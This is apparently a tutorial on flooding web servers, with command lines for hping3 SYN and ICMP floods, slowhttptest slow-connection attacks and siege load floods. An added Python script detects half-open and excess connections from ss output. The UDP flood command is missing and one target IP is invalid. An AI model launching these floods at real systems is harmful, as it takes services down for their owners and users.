hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like
ping does with ICMP replies. hping3 handles fragmentation, arbitrary packet body and size, and can be used
to transfer files under supported protocols.
hping3 can be used, among other things, to: test firewall rules, [spoofed] port scanning, test net performance
using different protocols, packet size, TOS (type of service) and fragmentation, path MTU discovery, file
transfer even between really fascist firewall rules, traceroute-like under different protocols, firewalk-like usage,
remote OS fingerprinting, TCP/IP stack auditing.
I will begin with an attack that exceeds the maximum number of half-open sessions (the SYN flood):
hping3 --flood -S -p 80 113.432.421.2
options: --flood: send as many packets as possible
-S: use SYN packets
-p 80: packets are sent to port 80 (HTTP)
The second type of attack is the ICMP flood. It is best used together with a large packet size, to try to exhaust the inbound channel of the attacked server.
hping3 --flood --icmp -d 1000 dstIP
options: --icmp: use ICMP packets
-d 1000: sets the packet size
Now let's try the UDP flood. This attack also saturates the bandwidth.
options: --udp: use UDP
-s 53: source port 53
--keep: fix the source port, otherwise it will increase by 1 for each next packet
-p 68: send packets to port 68
Now for the attacks directly on the Web server itself.
The first is a slow-connection attack. The idea is that any Web server has a limit on the number of concurrent connections, but when clients connect and request pages very slowly, the connections are not reset, and so the server's limited pool of concurrent connections is used up.
slowhttptest -c 1000 -H -i 20 -r 200 -t GET -u http://dstIP -x 24 -p 3
-c – the total number of connections
-i – pause between sessions for the loading of the page (in a single connection)
-r – the number of connections per second
-t GET – use GET requests (POST is also possible)
-u – the URL. Supports HTTP and HTTPS links
-x – the number of bytes downloaded from the page in a single session (as part of a single connection)
-p – timeout when checking the connection. If the server response is not received during this time, the server is considered unavailable
-H – slow headers attack, aka Slowloris
Other available attack types:
-B – slow body attack, aka R-U-Dead-Yet
-R – range attack, aka Apache killer
-X – slow read attack
And the last type of attack considered: the siege utility, which simply requests site pages in a huge number of threads, after which either server resources are exhausted (if a heavy page is requested) or outbound channel resources are exhausted (if heavy files are requested).
siege -i -c 2000 https://dstIP/page
-i: simulate a normal user
-c: the number of connections
page – the requested page. The type of attack depends on the selected page.
You can pass this utility the -R flag with a file listing pages.
No system is truly secure!
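From the defender's side, the half-open sessions behind the SYN flood and the connection exhaustion behind the slowhttptest and siege runs both show up in the server's socket table. The following is an added example, not part of the original post: it counts both from text in the layout of `ss -tan` output. The sample lines, the documentation-range addresses and both thresholds are constructed assumptions.

```python
from collections import Counter

# Constructed sample in the column layout of `ss -tan` (documentation-range addresses).
SAMPLE_SS = """\
State     Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN    0      128    0.0.0.0:80          0.0.0.0:*
SYN-RECV  0      0      192.0.2.10:80       198.51.100.7:40312
SYN-RECV  0      0      192.0.2.10:80       198.51.100.8:40313
SYN-RECV  0      0      192.0.2.10:80       198.51.100.9:40314
SYN-RECV  0      0      192.0.2.10:80       198.51.100.9:40315
ESTAB     0      0      192.0.2.10:80       203.0.113.5:51844
ESTAB     0      0      192.0.2.10:80       203.0.113.5:51845
ESTAB     0      0      192.0.2.10:80       203.0.113.5:51846
ESTAB     0      0      192.0.2.10:443      203.0.113.77:50000
"""

def split_endpoint(endpoint):
    """Split 'addr:port' on the last colon so bracketed IPv6 also works."""
    addr, _, port = endpoint.rpartition(":")
    return addr, port

def summarize(ss_text):
    """Count half-open sockets per local port and established ones per (port, peer)."""
    half_open, established = Counter(), Counter()
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] not in ("SYN-RECV", "ESTAB"):
            continue  # header, LISTEN and other states are ignored
        _, local_port = split_endpoint(fields[3])
        peer_addr, _ = split_endpoint(fields[4])
        if fields[0] == "SYN-RECV":
            half_open[local_port] += 1  # handshake not completed: half-open session
        else:
            established[(local_port, peer_addr)] += 1
    return half_open, established

def alerts(ss_text, max_half_open, max_conn_per_peer):
    """Return sorted alert tuples for counts above the given (assumed) thresholds."""
    half_open, established = summarize(ss_text)
    found = [("half-open", port, n) for port, n in half_open.items() if n > max_half_open]
    found += [("per-peer", f"{peer}->{port}", n)
              for (port, peer), n in established.items() if n > max_conn_per_peer]
    return sorted(found)

if __name__ == "__main__":
    for alert in alerts(SAMPLE_SS, max_half_open=3, max_conn_per_peer=2):
        print(alert)
```

Half-open counts are keyed by port only, because a spoofed SYN flood spreads across many peer addresses; the established-connection count is keyed per peer because slow-request and siege-style load comes from real, completed connections.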